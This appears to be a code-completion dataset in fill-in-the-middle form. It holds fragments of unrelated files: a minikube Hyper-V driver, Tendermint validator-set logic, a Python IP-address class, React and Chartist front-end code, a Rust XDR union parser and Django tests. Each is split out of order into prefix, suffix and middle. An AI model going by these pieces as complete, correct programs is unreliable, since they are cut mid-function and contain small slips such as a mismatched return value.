fixMessage := "Right-click the PowerShell icon and select Run as Administrator to open PowerShell in elevated mode."
return registry.State{Installed: true, Running: false, Error: err, Fix: fixMessage}
}
return registry.State{Installed: true, Healthy: true}
}
| {
d := hyperv.NewDriver(config.MachineName(cfg, n), localpath.MiniPath())
d.Boot2DockerURL = download.LocalISOResource(cfg.MinikubeISO)
d.VSwitch = cfg.HypervVirtualSwitch
if d.VSwitch == "" && cfg.HypervUseExternalSwitch {
switchName, adapter, err := chooseSwitch(cfg.HypervExternalAdapter)
if err != nil {
return nil, errors.Wrapf(err, "failed to choose switch for Hyper-V driver")
}
if cfg.HypervExternalAdapter == "" && switchName == "" {
// create a switch on the returned adapter
switchName = defaultExternalSwitchName
err := createVMSwitch(switchName, adapter)
if err != nil {
return "", err
}
}
d.VSwitch = switchName
}
d.MemSize = cfg.Memory
d.CPU = cfg.CPUs
d.DiskSize = cfg.DiskSize
d.SSHUser = "docker"
d.DisableDynamicMemory = true // default to disable dynamic memory as minikube is unlikely to work properly with dynamic memory
return d, nil
} |
validator_set.go | package types
import (
"bytes"
"fmt"
"sort"
"strings"
"github.com/pkg/errors"
cmn "github.com/tendermint/tmlibs/common"
"github.com/tendermint/tmlibs/merkle"
)
// ValidatorSet represents a set of *Validator at a given height.
// The validators can be fetched by address or index.
// The index is in order of .Address, so the indices are fixed
// for all rounds of a given blockchain height.
// On the other hand, the .AccumPower of each validator and
// the designated .GetProposer() of a set changes every round,
// upon calling .IncrementAccum().
// NOTE: Not goroutine-safe.
// NOTE: All get/set to validators should copy the value for safety.
// TODO: consider validator Accum overflow
type ValidatorSet struct {
// NOTE: persisted via reflect, must be exported.
Validators []*Validator `json:"validators"`
Proposer *Validator `json:"proposer"`
Height int64 // The validators for the height
// cached (unexported)
totalVotingPower int64
}
func NewValidatorSet(vals []*Validator) *ValidatorSet {
validators := make([]*Validator, len(vals))
for i, val := range vals {
validators[i] = val.Copy()
}
sort.Sort(ValidatorsByAddress(validators))
vs := &ValidatorSet{
Validators: validators,
}
if vals != nil {
vs.IncrementAccum(1)
}
return vs
}
// IncrementAccum increments the accum of each validator and updates the proposer.
// TODO: mind the overflow when times and votingPower shares too large.
func (valSet *ValidatorSet) IncrementAccum(times int) {
// Add VotingPower * times to each validator and order into heap.
validatorsHeap := cmn.NewHeap()
for _, val := range valSet.Validators {
val.Accum += val.VotingPower * int64(times) // TODO: mind overflow
validatorsHeap.Push(val, accumComparable{val})
}
// Decrement the validator with most accum times times
for i := 0; i < times; i++ {
mostest := validatorsHeap.Peek().(*Validator)
if i == times-1 {
valSet.Proposer = mostest
}
mostest.Accum -= int64(valSet.TotalVotingPower())
validatorsHeap.Update(mostest, accumComparable{mostest})
}
}
func (valSet *ValidatorSet) Copy() *ValidatorSet {
validators := make([]*Validator, len(valSet.Validators))
for i, val := range valSet.Validators {
// NOTE: must copy, since IncrementAccum updates in place.
validators[i] = val.Copy()
}
return &ValidatorSet{
Validators: validators,
Proposer: valSet.Proposer,
Height: valSet.Height,
totalVotingPower: valSet.totalVotingPower,
}
}
func (valSet *ValidatorSet) HasAddress(address []byte) bool {
idx := sort.Search(len(valSet.Validators), func(i int) bool {
return bytes.Compare(address, valSet.Validators[i].Address) <= 0
})
return idx != len(valSet.Validators) && bytes.Equal(valSet.Validators[idx].Address, address)
}
func (valSet *ValidatorSet) GetByAddress(address []byte) (index int, val *Validator) {
idx := sort.Search(len(valSet.Validators), func(i int) bool {
return bytes.Compare(address, valSet.Validators[i].Address) <= 0
})
if idx != len(valSet.Validators) && bytes.Equal(valSet.Validators[idx].Address, address) {
return idx, valSet.Validators[idx].Copy()
} else {
return 0, nil
}
}
// GetByIndex returns the validator by index.
// It returns nil values if index < 0 or
// index >= len(ValidatorSet.Validators)
func (valSet *ValidatorSet) GetByIndex(index int) (address []byte, val *Validator) {
if index < 0 || index >= len(valSet.Validators) {
return nil, nil
}
val = valSet.Validators[index]
return val.Address, val.Copy()
}
func (valSet *ValidatorSet) Size() int {
return len(valSet.Validators)
}
func (valSet *ValidatorSet) TotalVotingPower() int64 {
if valSet.totalVotingPower == 0 {
for _, val := range valSet.Validators {
valSet.totalVotingPower += val.VotingPower
}
}
return valSet.totalVotingPower
}
func (valSet *ValidatorSet) GetProposer() (proposer *Validator) {
if len(valSet.Validators) == 0 {
return nil
}
if valSet.Proposer == nil {
valSet.Proposer = valSet.findProposer()
}
return valSet.Proposer.Copy()
}
// GetProposerAtHeight returns the proposer for the given height and round.
func (valSet *ValidatorSet) GetProposerAtHeight(height int64, round int) (proposer *Validator) {
if len(valSet.Validators) == 0 {
return nil
}
if (height + int64(round)) > (valSet.Height + 1) {
tmpValSet := valSet.Copy()
tmpValSet.IncrementAccum(int(height + int64(round) - (valSet.Height + 1)))
if tmpValSet.Proposer == nil {
tmpValSet.Proposer = tmpValSet.findProposer()
}
return tmpValSet.Proposer.Copy()
}
if valSet.Proposer == nil {
valSet.Proposer = valSet.findProposer()
}
return valSet.Proposer.Copy()
}
func (valSet *ValidatorSet) findProposer() *Validator {
var proposer *Validator
for _, val := range valSet.Validators {
if proposer == nil || !bytes.Equal(val.Address, proposer.Address) {
proposer = proposer.CompareAccum(val)
}
}
return proposer
}
func (valSet *ValidatorSet) Hash() []byte {
if len(valSet.Validators) == 0 {
return nil
}
hashables := make([]merkle.Hashable, len(valSet.Validators))
for i, val := range valSet.Validators {
hashables[i] = val
}
return merkle.SimpleHashFromHashables(hashables)
}
func (valSet *ValidatorSet) Add(val *Validator) (added bool) {
val = val.Copy()
idx := sort.Search(len(valSet.Validators), func(i int) bool {
return bytes.Compare(val.Address, valSet.Validators[i].Address) <= 0
})
if idx == len(valSet.Validators) {
valSet.Validators = append(valSet.Validators, val)
// Invalidate cache
valSet.Proposer = nil
valSet.totalVotingPower = 0
return true
} else if bytes.Equal(valSet.Validators[idx].Address, val.Address) {
return false
} else {
newValidators := make([]*Validator, len(valSet.Validators)+1)
copy(newValidators[:idx], valSet.Validators[:idx])
newValidators[idx] = val
copy(newValidators[idx+1:], valSet.Validators[idx:])
valSet.Validators = newValidators
// Invalidate cache
valSet.Proposer = nil
valSet.totalVotingPower = 0
return true
}
}
func (valSet *ValidatorSet) Update(val *Validator) (updated bool) {
index, sameVal := valSet.GetByAddress(val.Address)
if sameVal == nil {
return false
} else {
valSet.Validators[index] = val.Copy()
// Invalidate cache
valSet.Proposer = nil
valSet.totalVotingPower = 0
return true
}
}
func (valSet *ValidatorSet) Remove(address []byte) (val *Validator, removed bool) {
idx := sort.Search(len(valSet.Validators), func(i int) bool {
return bytes.Compare(address, valSet.Validators[i].Address) <= 0
})
if idx == len(valSet.Validators) || !bytes.Equal(valSet.Validators[idx].Address, address) {
return nil, false
} else {
removedVal := valSet.Validators[idx]
newValidators := valSet.Validators[:idx]
if idx+1 < len(valSet.Validators) {
newValidators = append(newValidators, valSet.Validators[idx+1:]...)
}
valSet.Validators = newValidators
// Invalidate cache
valSet.Proposer = nil
valSet.totalVotingPower = 0
return removedVal, true
}
}
func (valSet *ValidatorSet) Iterate(fn func(index int, val *Validator) bool) {
for i, val := range valSet.Validators {
stop := fn(i, val.Copy())
if stop {
break
}
}
}
// Verify that +2/3 of the set had signed the given signBytes
func (valSet *ValidatorSet) VerifyCommit(chainID string, blockID BlockID, height int64, commit *Commit) error {
if valSet.Size() != len(commit.Precommits) {
return fmt.Errorf("Invalid commit -- wrong set size: %v vs %v", valSet.Size(), len(commit.Precommits))
}
if height != commit.Height() {
return fmt.Errorf("Invalid commit -- wrong height: %v vs %v", height, commit.Height())
}
talliedVotingPower := int64(0)
round := commit.Round()
for idx, precommit := range commit.Precommits {
// may be nil if validator skipped.
if precommit == nil {
continue
}
if precommit.Height != height {
return fmt.Errorf("Invalid commit -- wrong height: %v vs %v", height, precommit.Height)
}
if precommit.Round != round {
return fmt.Errorf("Invalid commit -- wrong round: %v vs %v", round, precommit.Round)
}
if precommit.Type != VoteTypePrecommit {
return fmt.Errorf("Invalid commit -- not precommit @ index %v", idx)
}
_, val := valSet.GetByIndex(idx)
// Validate signature
precommitSignBytes := SignBytes(chainID, precommit)
if !val.PubKey.VerifyBytes(precommitSignBytes, precommit.Signature) {
return fmt.Errorf("Invalid commit -- invalid signature: %v", precommit)
}
if !blockID.Equals(precommit.BlockID) {
continue // Not an error, but doesn't count
}
// Good precommit!
talliedVotingPower += val.VotingPower
}
if talliedVotingPower > valSet.TotalVotingPower()*2/3 {
return nil
} else {
return fmt.Errorf("Invalid commit -- insufficient voting power: got %v, needed %v",
talliedVotingPower, (valSet.TotalVotingPower()*2/3 + 1))
}
}
// VerifyCommitAny will check to see if the set would
// be valid with a different validator set.
//
// valSet is the validator set that we know
// * over 2/3 of the power in old signed this block
//
// newSet is the validator set that signed this block
// * only votes from old are sufficient for 2/3 majority
// in the new set as well
//
// That means that:
// * 10% of the valset can't just declare themselves kings
// * If the validator set is 3x old size, we need more proof to trust
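//
// As a worked example (numbers assumed for illustration): with the old and
// new sets each totalling 100 voting power, a commit tallying 70 old power
// and 70 new power passes both "> 2/3" checks below, while 70 old power and
// 60 new power fails the new-set check.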
func (valSet *ValidatorSet) VerifyCommitAny(newSet *ValidatorSet, chainID string,
blockID BlockID, height int64, commit *Commit) error {
if newSet.Size() != len(commit.Precommits) {
return errors.Errorf("Invalid commit -- wrong set size: %v vs %v", newSet.Size(), len(commit.Precommits))
}
if height != commit.Height() {
return errors.Errorf("Invalid commit -- wrong height: %v vs %v", height, commit.Height())
}
oldVotingPower := int64(0)
newVotingPower := int64(0)
seen := map[int]bool{}
round := commit.Round()
for idx, precommit := range commit.Precommits {
// first check as in VerifyCommit
if precommit == nil {
continue
}
if precommit.Height != height {
// return certerr.ErrHeightMismatch(height, precommit.Height)
return errors.Errorf("Blocks don't match - %d vs %d", round, precommit.Round)
}
if precommit.Round != round {
return errors.Errorf("Invalid commit -- wrong round: %v vs %v", round, precommit.Round)
}
if precommit.Type != VoteTypePrecommit {
return errors.Errorf("Invalid commit -- not precommit @ index %v", idx)
}
if !blockID.Equals(precommit.BlockID) {
continue // Not an error, but doesn't count
}
// we only grab by address, ignoring unknown validators
vi, ov := valSet.GetByAddress(precommit.ValidatorAddress)
if ov == nil || seen[vi] {
continue // missing or double vote...
}
seen[vi] = true
// Validate signature old school
precommitSignBytes := SignBytes(chainID, precommit)
if !ov.PubKey.VerifyBytes(precommitSignBytes, precommit.Signature) {
return errors.Errorf("Invalid commit -- invalid signature: %v", precommit)
}
// Good precommit!
oldVotingPower += ov.VotingPower
// check new school
_, cv := newSet.GetByIndex(idx)
if cv.PubKey.Equals(ov.PubKey) {
// make sure this is properly set in the current block as well
newVotingPower += cv.VotingPower
}
}
if oldVotingPower <= valSet.TotalVotingPower()*2/3 {
return errors.Errorf("Invalid commit -- insufficient old voting power: got %v, needed %v",
oldVotingPower, (valSet.TotalVotingPower()*2/3 + 1))
} else if newVotingPower <= newSet.TotalVotingPower()*2/3 {
return errors.Errorf("Invalid commit -- insufficient cur voting power: got %v, needed %v",
newVotingPower, (newSet.TotalVotingPower()*2/3 + 1))
}
return nil
}
func (valSet *ValidatorSet) String() string {
return valSet.StringIndented("")
}
func (valSet *ValidatorSet) StringIndented(indent string) string {
if valSet == nil {
return "nil-ValidatorSet"
}
valStrings := []string{}
valSet.Iterate(func(index int, val *Validator) bool {
valStrings = append(valStrings, val.String())
return false
})
return fmt.Sprintf(`ValidatorSet{
%s Proposer: %v
%s Validators:
%s %v
%s}`,
indent, valSet.GetProposer().String(),
indent,
indent, strings.Join(valStrings, "\n"+indent+" "),
indent)
}
//-------------------------------------
// Implements sort for sorting validators by address.
type ValidatorsByAddress []*Validator
func (vs ValidatorsByAddress) Len() int {
return len(vs)
}
func (vs ValidatorsByAddress) Less(i, j int) bool {
return bytes.Compare(vs[i].Address, vs[j].Address) == -1
}
func (vs ValidatorsByAddress) Swap(i, j int) {
it := vs[i]
vs[i] = vs[j]
vs[j] = it
}
//-------------------------------------
// Use with Heap for sorting validators by accum
type accumComparable struct {
*Validator
}
// We want to find the validator with the greatest accum.
func (ac accumComparable) Less(o interface{}) bool {
other := o.(accumComparable).Validator
larger := ac.CompareAccum(other)
return bytes.Equal(larger.Address, ac.Address)
}
//----------------------------------------
// For testing
// RandValidatorSet returns a randomized validator set, useful for testing.
// NOTE: PrivValidator are in order.
// UNSTABLE
func | (numValidators int, votingPower int64) (*ValidatorSet, []*PrivValidatorFS) {
vals := make([]*Validator, numValidators)
privValidators := make([]*PrivValidatorFS, numValidators)
for i := 0; i < numValidators; i++ {
val, privValidator := RandValidator(false, votingPower)
vals[i] = val
privValidators[i] = privValidator
}
valSet := NewValidatorSet(vals)
sort.Sort(PrivValidatorsByAddress(privValidators))
return valSet, privValidators
}
| RandValidatorSet |
ipaddr.py | from tfchain.polyfill.encoding.jsmods.ipaddrjs import api as ipaddrjs
import tfchain.polyfill.array as jsarr
class IPAddress:
def __init__(self, value):
if isinstance(value, str):
v = None
err = None
__pragma__("js", "{}", """
try {
v = ipaddrjs.parse(value);
} catch(e) {
err = e;
}
""")
if err != None:
raise ValueError("invalid str value {}: {}".format(value, err))
self._value = v
elif isinstance(value, (bytes, bytearray)) or jsarr.is_uint8_array(value):
v = None
err = None
__pragma__("js", "{}", """
try {
v = ipaddrjs.fromByteArray(value);
} catch(e) {
err = e;
}
""")
if err != None:
raise ValueError("invalid raw value {}: {}".format(value, err))
self._value = v
elif isinstance(value, IPAddress):
self._value = value.value
else:
raise TypeError("value {} of type {} is not supported as an IPAddress".format(value, type(value)))
@property
def value(self):
return self._value
def is_ipv4(self):
result = None
v = self._value
__pragma__("js", "{}", """
result = v.constructor === ipaddrjs.IPv4;
""")
return result
def is_ipv6(self):
result = None
v = self._value
__pragma__("js", "{}", """
result = v.constructor === ipaddrjs.IPv6;
""")
return result
def __str__(self):
return self._value.toString()
def str(self):
return self.__str__()
def | (self):
v = self._value
__pragma__("js", "{}", """
v = new Uint8Array(v.toByteArray());
""")
return v
| bytes |
withRoot.js | import React from 'react';
import { MuiThemeProvider, createMuiTheme } from '@material-ui/core/styles';
import CssBaseline from '@material-ui/core/CssBaseline';
// A theme with custom primary and secondary color.
// It's optional.
const theme = createMuiTheme({
typography: {
useNextVariants: true,
},
palette: {
primary: {
light: '#62727b',
main: '#37474f',
dark: '#102027',
contrastText: '#ffffff',
},
secondary: {
light: '#ff833a',
main: '#e65100',
dark: '#ac1900',
contrastText: '#eeeeee',
},
},
}); | // thanks to React context.
return (
<MuiThemeProvider theme={theme}>
{/* CssBaseline kickstarts an elegant, consistent, and simple baseline to build upon. */}
<CssBaseline />
<Component {...props} />
</MuiThemeProvider>
);
}
return WithRoot;
}
export default withRoot; |
function withRoot(Component) {
function WithRoot(props) {
// MuiThemeProvider makes the theme available down the React tree |
union.rs | use super::*;
#[derive(Debug, Clone, PartialEq)]
pub struct UnionSwitch {
pub var_name: String,
pub var_type: BasicType,
}
#[derive(Debug, Clone, PartialEq)]
pub struct Union {
pub name: String,
pub cases: Vec<UnionCase>,
pub default: Option<UnionCase>,
pub void_cases: Vec<String>,
pub switch: UnionSwitch,
}
impl Union {
pub(crate) fn new(vs: Vec<Node<'_>>) -> Self {
let name = vs[0].ident_str().to_string();
let mut cases = Vec::new();
let mut void_cases = Vec::new();
let mut default = None;
let switch = UnionSwitch {
var_name: vs[2].ident_str().to_string(),
var_type: BasicType::from(vs[1].ident_str().to_string()),
};
// Collect the set of case values that "fallthrough" to the eventual
// UnionCase
let mut case_values = Vec::new();
for v in vs.into_iter().skip(3) {
let mut is_default_case = false;
let stmt = match v {
Node::UnionCase(nodes) => CaseStmt::parse(case_values, nodes),
Node::UnionDefault(nodes) => {
is_default_case = true;
case_values.push("default".to_string());
CaseStmt::parse(case_values, nodes)
}
v => panic!("unexpected token type for union {:?}", v),
};
match stmt {
CaseStmt::Defined(c) if is_default_case => default = Some(c),
CaseStmt::Defined(c) => cases.push(c),
CaseStmt::Fallthrough(values) => {
// The parsed fallthrough ident has been pushed to the
// returned case_values
case_values = values;
continue;
}
CaseStmt::Void(values) => void_cases.extend_from_slice(&values),
}
case_values = Vec::new();
}
Union {
name,
cases,
default,
void_cases,
switch,
}
}
pub fn name(&self) -> &str {
&self.name
}
}
impl CompoundType for Union {
fn inner_types(&self) -> Vec<&ArrayType<BasicType>> {
self.cases
.iter()
.chain(self.default.iter())
.map(|f| &f.field_value)
.collect()
}
fn contains_opaque(&self) -> bool {
self.cases
.iter()
.chain(self.default.iter())
.any(|f| f.contains_opaque())
}
}
#[derive(Debug, Clone, PartialEq)]
pub struct | {
/// The case values that map to this field name and type.
///
/// This can be more than one value when the union contains fallthrough
/// statements.
pub case_values: Vec<String>,
pub field_name: String,
pub field_value: ArrayType<BasicType>,
}
impl UnionCase {
pub(crate) fn new(case_values: Vec<String>, field: Vec<Node<'_>>) -> Self {
match field.as_slice() {
[Node::Type(t), Node::Type(BasicType::Ident(l))] => Self {
case_values,
field_name: l.to_string(),
field_value: ArrayType::None(t.to_owned()),
},
_ => panic!("invalid number of union field tokens"),
}
}
pub fn contains_opaque(&self) -> bool {
matches!(self.field_value.unwrap_array(), BasicType::Opaque)
}
}
enum CaseStmt {
/// A case statement with no fields defined, falling through to the next
/// case statement.
Fallthrough(Vec<String>),
/// A fully-defined case statement, with a case value and fields.
Defined(UnionCase),
Void(Vec<String>),
}
impl CaseStmt {
fn parse(mut case_values: Vec<String>, mut nodes: Vec<Node<'_>>) -> Self {
match nodes.remove(0) {
Node::Type(t) => case_values.push(t.as_str().to_string()),
Node::UnionVoid => {
// No ident, this is a default case
return Self::Void(case_values);
}
Node::UnionDataField(nodes) => {
// No ident, this is a default case
return Self::Defined(UnionCase::new(case_values, nodes));
}
_ => unreachable!(),
};
if nodes.is_empty() {
return Self::Fallthrough(case_values);
}
match nodes.remove(0) {
Node::UnionDataField(nodes) => Self::Defined(UnionCase::new(case_values, nodes)),
Node::UnionVoid => Self::Void(case_values),
_ => unreachable!(),
}
}
}
#[cfg(test)]
mod tests {
use super::*;
macro_rules! parse {
($input: expr) => {{
let ast = XDRParser::parse(Rule::item, $input)
.unwrap()
.next()
.unwrap();
let root = walk(ast);
let union = root.into_inner().remove(0);
match union {
Node::Union(u) => u,
_ => panic!("not a union in ast root"),
}
}};
}
#[test]
fn test_union() {
let got = parse!(
r#"
union createhow4 switch (createmode4 mode) {
case GUARDED4:
fattr4 createattrs;
case EXCLUSIVE4:
verifier4 createverf;
};"#
);
assert_eq!(got.name, "createhow4");
assert_eq!(got.default, None);
assert_eq!(got.void_cases.len(), 0);
assert_eq!(got.cases.len(), 2);
assert_eq!(&got.cases[0].case_values, &["GUARDED4"]);
assert_eq!(got.cases[0].field_name, "createattrs");
assert_eq!(
got.cases[0].field_value,
ArrayType::None(BasicType::Ident("fattr4".to_string()))
);
assert_eq!(&got.cases[1].case_values, &["EXCLUSIVE4"]);
assert_eq!(got.cases[1].field_name, "createverf");
assert_eq!(
got.cases[1].field_value,
ArrayType::None(BasicType::Ident("verifier4".to_string()))
);
assert_eq!(got.switch.var_name, "mode");
assert_eq!(
got.switch.var_type,
BasicType::Ident("createmode4".to_string())
);
}
#[test]
fn test_union_fallthrough() {
let got = parse!(
r#"
union createhow4 switch (createmode4 mode) {
case UNCHECKED4:
case GUARDED4:
fattr4 createattrs;
case EXCLUSIVE4:
verifier4 createverf;
};"#
);
assert_eq!(got.name, "createhow4");
assert_eq!(got.default, None);
assert_eq!(got.void_cases.len(), 0);
assert_eq!(got.cases.len(), 2);
assert_eq!(&got.cases[0].case_values, &["UNCHECKED4", "GUARDED4"]);
assert_eq!(got.cases[0].field_name, "createattrs");
assert_eq!(
got.cases[0].field_value,
ArrayType::None(BasicType::Ident("fattr4".to_string()))
);
assert_eq!(&got.cases[1].case_values, &["EXCLUSIVE4"]);
assert_eq!(got.cases[1].field_name, "createverf");
assert_eq!(
got.cases[1].field_value,
ArrayType::None(BasicType::Ident("verifier4".to_string()))
);
assert_eq!(got.switch.var_name, "mode");
assert_eq!(
got.switch.var_type,
BasicType::Ident("createmode4".to_string())
);
}
#[test]
fn test_union_void_default() {
let got = parse!(
r#"
union LOCKU4res switch (nfsstat4 status) {
case NFS4_OK:
stateid4 lock_stateid;
default:
void;
};"#
);
assert_eq!(got.name, "LOCKU4res");
assert_eq!(got.default, None);
assert_eq!(got.cases.len(), 1);
assert_eq!(&got.cases[0].case_values, &["NFS4_OK"]);
assert_eq!(got.cases[0].field_name, "lock_stateid");
assert_eq!(
got.cases[0].field_value,
ArrayType::None(BasicType::Ident("stateid4".to_string()))
);
assert_eq!(got.void_cases.len(), 1);
assert_eq!(&got.void_cases, &["default"]);
assert_eq!(got.switch.var_name, "status");
assert_eq!(
got.switch.var_type,
BasicType::Ident("nfsstat4".to_string())
);
}
#[test]
fn test_union_default() {
let got = parse!(
r#"
union LOCKU4res switch (nfsstat4 status) {
case NFS4_OK:
stateid4 lock_stateid;
default:
type_name field_name;
};"#
);
assert_eq!(got.name, "LOCKU4res");
assert_eq!(got.cases.len(), 1);
assert_eq!(&got.cases[0].case_values, &["NFS4_OK"]);
assert_eq!(got.cases[0].field_name, "lock_stateid");
assert_eq!(
got.cases[0].field_value,
ArrayType::None(BasicType::Ident("stateid4".to_string()))
);
assert_eq!(got.void_cases.len(), 0);
let default = &got.default.unwrap();
assert_eq!(default.case_values, &["default"]);
assert_eq!(default.field_name, "field_name");
assert_eq!(
default.field_value,
ArrayType::None(BasicType::Ident("type_name".to_string()))
);
assert_eq!(got.switch.var_name, "status");
assert_eq!(
got.switch.var_type,
BasicType::Ident("nfsstat4".to_string())
);
}
#[test]
fn test_union_case_void() {
let got = parse!(
r#"
union LOCKU4res switch (nfsstat4 status) {
case NFS4_OK:
stateid4 lock_stateid;
case something:
void;
default:
type_name field_name;
};"#
);
assert_eq!(got.name, "LOCKU4res");
assert_eq!(got.cases.len(), 1);
assert_eq!(&got.cases[0].case_values, &["NFS4_OK"]);
assert_eq!(got.cases[0].field_name, "lock_stateid");
assert_eq!(
got.cases[0].field_value,
ArrayType::None(BasicType::Ident("stateid4".to_string()))
);
assert_eq!(got.void_cases, &["something"]);
let default = &got.default.unwrap();
assert_eq!(default.case_values, &["default"]);
assert_eq!(default.field_name, "field_name");
assert_eq!(
default.field_value,
ArrayType::None(BasicType::Ident("type_name".to_string()))
);
assert_eq!(got.switch.var_name, "status");
assert_eq!(
got.switch.var_type,
BasicType::Ident("nfsstat4".to_string())
);
}
#[test]
fn test_union_case_void_fallthrough() {
let got = parse!(
r#"
union LOCKU4res switch (nfsstat4 status) {
case NFS4_OK:
stateid4 lock_stateid;
case another:
case something:
void;
default:
type_name field_name;
};"#
);
assert_eq!(got.name, "LOCKU4res");
assert_eq!(got.cases.len(), 1);
assert_eq!(&got.cases[0].case_values, &["NFS4_OK"]);
assert_eq!(got.cases[0].field_name, "lock_stateid");
assert_eq!(
got.cases[0].field_value,
ArrayType::None(BasicType::Ident("stateid4".to_string()))
);
assert_eq!(got.void_cases, &["another", "something",]);
let default = &got.default.unwrap();
assert_eq!(default.case_values, &["default"]);
assert_eq!(default.field_name, "field_name");
assert_eq!(
default.field_value,
ArrayType::None(BasicType::Ident("type_name".to_string()))
);
assert_eq!(got.switch.var_name, "status");
assert_eq!(
got.switch.var_type,
BasicType::Ident("nfsstat4".to_string())
);
}
}
| UnionCase |
charts.js | // ##############################
// // // JavaScript library for creating charts
// #############################
const Chartist = require("chartist");
// ##############################
// // // variables used to create animation on charts
// #############################
var delays = 80,
durations = 500;
var delays2 = 80,
durations2 = 500; | // #############################
const dailySalesChart = {
data: {
//labels: ["M", "T", "W", "T", "F", "S", "S"],
//series: [[12, 17, 7, 17, 23, 18, 38]]
},
options: {
lineSmooth: Chartist.Interpolation.cardinal({
tension: 0
}),
low: 0,
high: 50, // creative tim: we recommend you set "high" to the biggest value + something extra for a better look
chartPadding: {
top: 0,
right: 0,
bottom: 0,
left: 0
},
showArea: true,
width: '400px',
height: '400px',
axisY: {
low: 0,
onlyInteger: true
}
},
// for animation
animation: {
draw: function(data) {
if(data.type === 'grid' && data.index === 0) {
data.element.attr({"style": "stroke:black;stroke-width:2"});
}
if (data.type === "line" || data.type === "area") {
data.element.animate({
d: {
begin: 600,
dur: 700,
from: data.path
.clone()
.scale(2, 0)
.translate(0, data.chartRect.height())
.stringify(),
to: data.path.clone().stringify(),
easing: Chartist.Svg.Easing.easeOutQuint
}
});
} else if (data.type === "point") {
data.element.animate({
opacity: {
begin: (data.index + 1) * delays,
dur: durations,
from: 0,
to: 1,
easing: "ease"
}
});
}
}
}
};
// ##############################
// // // Email Subscriptions
// #############################
const emailsSubscriptionChart = {
data: {
labels: [
"Jan",
"Feb",
"Mar",
"Apr",
"Mai",
"Jun",
"Jul",
"Aug",
"Sep",
"Oct",
"Nov",
"Dec"
],
series: [[542, 443, 320, 780, 553, 453, 326, 434, 568, 610, 756, 895]]
},
options: {
axisX: {
showGrid: false
},
low: 0,
high: 1000,
chartPadding: {
top: 0,
right: 5,
bottom: 0,
left: 0
}
},
responsiveOptions: [
[
"screen and (max-width: 640px)",
{
seriesBarDistance: 5,
axisX: {
labelInterpolationFnc: value => value[0]
}
}
]
],
animation: {
draw: data => {
if(data.type === 'grid' && data.index === 0) {
data.element.attr({"style": "stroke:black;stroke-width:2"});
}
if (data.type === "bar") {
data.element.animate({
opacity: {
begin: (data.index + 1) * delays2,
dur: durations2,
from: 0,
to: 1,
easing: "ease"
}
});
}
}
}
};
// ##############################
// // // Completed Tasks
// #############################
const completedTasksChart = {
data: {
labels: ["12am", "3pm", "6pm", "9pm", "12pm", "3am", "6am", "9am"],
series: [[230, 750, 450, 300, 280, 240, 200, 190]]
},
options: {
lineSmooth: Chartist.Interpolation.cardinal({
tension: 0
}),
low: 0,
high: 1000, // creative tim: we recommend you set "high" to the biggest value + something extra for a better look
chartPadding: {
top: 0,
right: 0,
bottom: 0,
left: 0
}
},
animation: {
draw: data => {
if(data.type === 'grid' && data.index === 0) {
data.element.attr({"style": "stroke:black;stroke-width:2"});
}
if (data.type === "line" || data.type === "area") {
data.element.animate({
d: {
begin: 600,
dur: 700,
from: data.path
.clone()
.scale(1, 0)
.translate(0, data.chartRect.height())
.stringify(),
to: data.path.clone().stringify(),
easing: Chartist.Svg.Easing.easeOutQuint
}
});
} else if (data.type === "point") {
data.element.animate({
opacity: {
begin: (data.index + 1) * delays,
dur: durations,
from: 0,
to: 1,
easing: "ease"
}
});
}
}
}
};
module.exports = {
dailySalesChart,
emailsSubscriptionChart,
completedTasksChart
}; |
// ##############################
// // // Daily Sales |
tests.py | from django.test import TestCase
from models import Photo, Album
from imagr_users.models import ImagrUser
from imagr_images.models import get_file_owner_username
from admin import PhotoAdmin, AlbumAdmin, ImageSizeListFilter
from django.core.urlresolvers import reverse
from django.contrib.admin.sites import AdminSite
import datetime
from django.test.utils import setup_test_environment
setup_test_environment()
from django.test.client import Client
client = Client()
class ImagrTests(TestCase):
|
u1.follow(u2)
u1.follow(u3)
Photo.objects.create(
image='test.png',
title='u1 test image',
owner=u1,
published=1)
Photo.objects.create(
image='test.png',
title='u2 test image',
owner=u2,
published=1)
Photo.objects.create(
image='test.png',
title='u3 test image',
owner=u3,
published=1)
Album.objects.create(
title='test album',
owner=u1,
published=1,
)
self.site = AdminSite()
def test_get_file_owner(self):
test_photo = Photo.objects.get(title='u1 test image')
self.assertEqual(isinstance(test_photo, Photo), True)
test_filename = '/garbage/garbage/garbage/test.png'
result = get_file_owner_username(test_photo, test_filename)
today = datetime.datetime.utcnow()
expected = 'testuser/{}/{}/{}'.format(unicode(today.year), unicode(today.month), u'test.png')
self.assertEquals(result, expected)
def test_photo_save(self):
test_photo = Photo.objects.get(title='u1 test image')
self.assertGreater(test_photo.image_size, 0)
def test_album_owner_link(self):
test_album = Album.objects.get(title='test album')
expected = "<a href='../../imagr_users/imagruser/{}/'>{}</a>".format(
test_album.owner.id,
test_album.owner)
test_album_admin = AlbumAdmin(test_album, self.site)
self.assertEquals(test_album_admin.owner_link(test_album), expected)
def test_photo_owner_link(self):
test_photo = Photo.objects.get(title='u1 test image')
expected = "<a href='../../imagr_users/imagruser/{}/'>{}</a>".format(
test_photo.owner.id,
test_photo.owner)
test_photo_admin = AlbumAdmin(test_photo, self.site)
self.assertEquals(test_photo_admin.owner_link(test_photo), expected)
def test_view_stream_page(self):
#client.logout()
user = ImagrUser.objects.get(username='testuser')
client.logout()
#client.login()
# self.assertEqual(client.session['_auth_user_id'], user.pk)
response = client.get(reverse('stream_page'))
self.assertEquals(response.status_code, 200)
actual_photos = response.context['photos']
self.assertEquals(len(actual_photos), 3)
self.assertEquals(actual_photos[0].title, 'u3 test image')
self.assertEquals(actual_photos[1].title, 'u2 test image')
self.assertEquals(actual_photos[2].title, 'u1 test image') | def setUp(self):
u1 = ImagrUser.objects.create(username='testuser')
u2 = ImagrUser.objects.create(username='testuser2')
u3 = ImagrUser.objects.create(username='testuser3') |
parse_expression.rs | #![allow(clippy::trivial_regex)]
use once_cell::sync::Lazy;
use regex::Regex;
use std::borrow::Cow;
use super::helpers::{parsing_catch_all, Token, TokenExtensions};
use super::Rule;
use crate::ast::*;
pub fn parse_expression(token: &Token) -> Expression {
let first_child = token.first_relevant_child();
let span = Span::from_pest(first_child.as_span());
match first_child.as_rule() {
Rule::numeric_literal => Expression::NumericValue(first_child.as_str().to_string(), span),
Rule::string_literal => Expression::StringValue(parse_string_literal(&first_child), span),
Rule::boolean_literal => Expression::BooleanValue(first_child.as_str().to_string(), span),
Rule::constant_literal => Expression::ConstantValue(first_child.as_str().to_string(), span),
Rule::function => parse_function(&first_child),
Rule::array_expression => parse_array(&first_child),
_ => unreachable!(
